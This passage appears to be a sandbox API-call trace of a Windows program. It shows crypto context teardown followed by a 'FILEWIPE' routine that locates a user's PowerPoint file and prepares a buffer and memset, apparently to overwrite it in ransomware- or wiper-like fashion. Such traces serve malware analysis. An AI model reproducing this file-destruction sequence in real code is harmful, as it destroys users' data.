HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.479] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.482] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.482] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.482] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.482] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.482] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.482] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.482] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.482] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.482] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.482] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.482] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.482] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.488] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.488] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.488] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.490] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.490] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.490] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.490] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.490] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.491] CryptDestroyKey (hKey=0x7c2200) returned 1 [0036.491] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.492] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.492] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.493] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.493] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.493] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.493] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.493] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.493] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.493] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.493] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.493] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.493] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.493] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0036.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.493] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.494] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.494] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.494] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.494] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.494] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.494] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.494] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.494] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.494] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0036.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.495] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.495] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0036.495] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.495] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.495] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.497] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.498] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.498] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0036.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.498] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.499] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaf83f0, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0x100688a0, ftLastAccessTime.dwHighDateTime=0x1d5c402, ftLastWriteTime.dwLowDateTime=0x100688a0, ftLastWriteTime.dwHighDateTime=0x1d5c402, nFileSizeHigh=0x0, nFileSizeLow=0xd05e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sZLYM.pptx", cAlternateFileName="SZLYM~1.PPT")) returned 0x7c2240 [0036.499] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0036.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.499] CharLowerBuffW (in: lpsz="byte[53342]", cchLength=0xb | out: lpsz="byte[53342]") returned 0xb [0036.499] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.499] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.500] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.500] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.500] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.500] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.500] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.501] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.501] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.501] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.502] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.502] CharLowerBuffW (in: 